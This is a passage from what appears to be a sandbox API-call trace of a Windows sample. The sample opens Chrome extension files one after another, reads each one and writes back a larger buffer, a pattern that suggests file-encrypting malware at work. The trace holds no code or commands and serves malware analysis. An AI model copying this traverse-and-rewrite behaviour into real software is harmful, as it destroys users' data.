lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0177.732] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0177.732] CloseHandle (hObject=0x1cc) returned 1 [0177.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.734] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.734] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xfc [0177.734] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.734] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.734] ReleaseMutex (hMutex=0x168) returned 1 [0177.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_close.png", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0177.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_close.png", cchWideChar=32, lpMultiByteStr=0x1fa53fc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="topbar_floating_button_close.png", lpUsedDefaultChar=0x0) returned 32 [0177.735] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0xfc, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0xfc, lpOverlapped=0x0) returned 1 [0177.736] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.736] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x684, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x684, lpOverlapped=0x0) returned 1 [0177.736] CloseHandle (hObject=0x1cc) returned 1 [0177.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x282 [0177.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.738] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.738] ReleaseMutex (hMutex=0x168) returned 1 [0177.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.739] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x282, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x282, lpOverlapped=0x0) returned 1 [0177.745] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.745] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x80a, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2e9f2d0*=0x80a, lpOverlapped=0x0) returned 1 [0177.745] CloseHandle (hObject=0x1cc) returned 1 [0177.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.746] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.746] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a1 [0177.747] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.747] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.747] ReleaseMutex (hMutex=0x168) returned 1 [0177.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.747] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x2a1, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x2a1, lpOverlapped=0x0) returned 1 [0178.697] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.697] WriteFile (in: hFile=0x1cc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x829, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x829, lpOverlapped=0x0) returned 1 [0178.697] CloseHandle (hObject=0x1cc) returned 1 [0178.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.698] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.699] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x30a [0178.699] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.699] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.699] ReleaseMutex (hMutex=0x168) returned 1 [0178.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.699] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x30a, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x30a, lpOverlapped=0x0) returned 1 [0178.701] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.701] WriteFile (in: hFile=0x1cc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x892, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x892, lpOverlapped=0x0) returned 1 [0178.701] CloseHandle (hObject=0x1cc) returned 1 [0178.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.702] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.702] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x295 [0178.702] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.702] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.702] ReleaseMutex (hMutex=0x168) returned 1 [0178.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.702] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x295, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x295, lpOverlapped=0x0) returned 1 [0178.704] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.704] WriteFile (in: hFile=0x1cc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x81d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x81d, lpOverlapped=0x0) returned 1 [0178.704] CloseHandle (hObject=0x1cc) returned 1 [0178.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.705] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.705] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x28a [0178.705] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.705] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.705] ReleaseMutex (hMutex=0x168) returned 1 [0178.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.706] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x28a, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x28a, lpOverlapped=0x0) returned 1 [0178.707] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.707] WriteFile (in: hFile=0x1cc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x812, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x812, lpOverlapped=0x0) returned 1 [0178.707] CloseHandle (hObject=0x1cc) returned 1 [0178.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.708] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.708] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x138 [0178.708] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.708] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.708] ReleaseMutex (hMutex=0x168) returned 1 [0178.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.708] ReadFile (in: hFile=0x1cc, lpBuffer=0x2851278, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2851278*, lpNumberOfBytesRead=0x2e9f2bc*=0x138, lpOverlapped=0x0) returned 1 [0178.709] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.709] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6c0, lpOverlapped=0x0) returned 1 [0178.710] CloseHandle (hObject=0x1cc) returned 1 [0178.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x10d [0178.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.711] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.711] ReleaseMutex (hMutex=0x168) returned 1 [0178.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.711] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ef2138, nNumberOfBytesToRead=0x10d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2138*, lpNumberOfBytesRead=0x2e9f2bc*=0x10d, lpOverlapped=0x0) returned 1 [0178.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.712] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x695, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2e9f2d0*=0x695, lpOverlapped=0x0) returned 1 [0178.712] CloseHandle (hObject=0x1cc) returned 1 [0178.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.713] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.713] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x100 [0178.713] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.713] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.714] ReleaseMutex (hMutex=0x168) returned 1 [0178.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.714] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0x100, lpOverlapped=0x0) returned 1 [0178.715] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.715] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x688, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2e9f2d0*=0x688, lpOverlapped=0x0) returned 1 [0178.715] CloseHandle (hObject=0x1cc) returned 1 [0178.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xde [0178.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.716] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.716] ReleaseMutex (hMutex=0x168) returned 1 [0178.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.716] 